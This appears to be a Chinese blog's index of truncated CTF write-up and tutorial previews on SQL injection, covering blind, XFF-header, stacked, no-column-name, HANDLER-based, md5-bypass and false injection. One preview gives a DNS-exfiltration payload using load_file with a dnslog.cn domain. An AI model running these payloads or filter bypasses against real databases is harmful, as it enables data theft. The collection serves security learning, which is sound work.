知识点:information_schema.tables变形。无列名比较注入 fuzz一下 发现可用^异或,可以进行盲注 因为information_schema被过滤了,我们要获得表名可以用 sys.schema_table_statistics_w...
sql注入
[RoarCTF 2019]Online Proxy
知识点:sql盲注 XFF注入 知识点很简单,就是从xff头进行sql注入.只是这个模型没见过:xff输入一个sql注入payload后提交后,然后再发包换一个xff头过去,会显示last ip:... ,然后再发一个xff一样的包,若sql注...
[CISCN2019 总决赛 Day2 Web1]Easyweb
知识点: sql盲注 二分法盲注 文件上传 .bak泄露 进来后常规思路,找robots.txt文件 提示bak文件,同时我们在主界面的源代码中看见了可疑的image.php 我们访问image.php.bak,得到image.php...
[SUCTF 2019]EasySQL1
知识点:sql_mode,堆叠注入 [SUCTF 2019]EasySQL1 知识点:sql_mode,堆叠注入 sql_mode: 一个参数,用于控制sql语句的某些行为. 如set sql_mode=PIPES_AS_CONCAT的意思就是将"||"视为字符串...
无列名注入
可用于information_schema被禁用时(具体来讲是知道了库,表名却不知道列名 无列名注入 可用于information_schema被禁用时(具体来讲是知道了库,表名却不知道列名 先来讲讲原理: 我们直接select1,...
用handler命令来代替select绕过sql注入过滤
可以使用handler命令来代替select。 mysql查询表中数据除了可以用select还可以用handler。它的语法如下 HANDLER tbl_name OPEN [ [AS] alias] //获取句柄 HANDLER tbl_name READ index_name { = |...
绕过 md5(str,true).来进行注入
实际操作时,你想要登入后台时,当你发现sql语句结构是这种select * from 'table' where psw=md5($_['psw'],true) ,会非常蛋疼。 那么怎么绕过呢 绕过 md5(str,true). 来进行注入 实际操作时,你...
SQL注入:DNS注入
dns注入 payload: select load_file(concat(“\\\\",payload,".域名\\a"); 具体步骤: 在http://www.dnslog.cn该网站上取得一个域名,在file_priv是空的情况下,使用上面的payload,loa...
SQL注入:False注入
原理:sql中字符串和数字进行比较时,字符串会被转换成浮点数,若字符串前几位不是数字则会被转换成0,若前几位有数字则会被转换成那几个数字。 false注入 原理: sql中字符串和数字进行比较时,字...
SQL注入基础
SQL注入: 1.常用函数及操作符: version()// mysql版本 user()// 数据库用户名 database()//数据库名 @@datadir //数据库路径 @@version_compile_os //操作系统和版本 concat(s...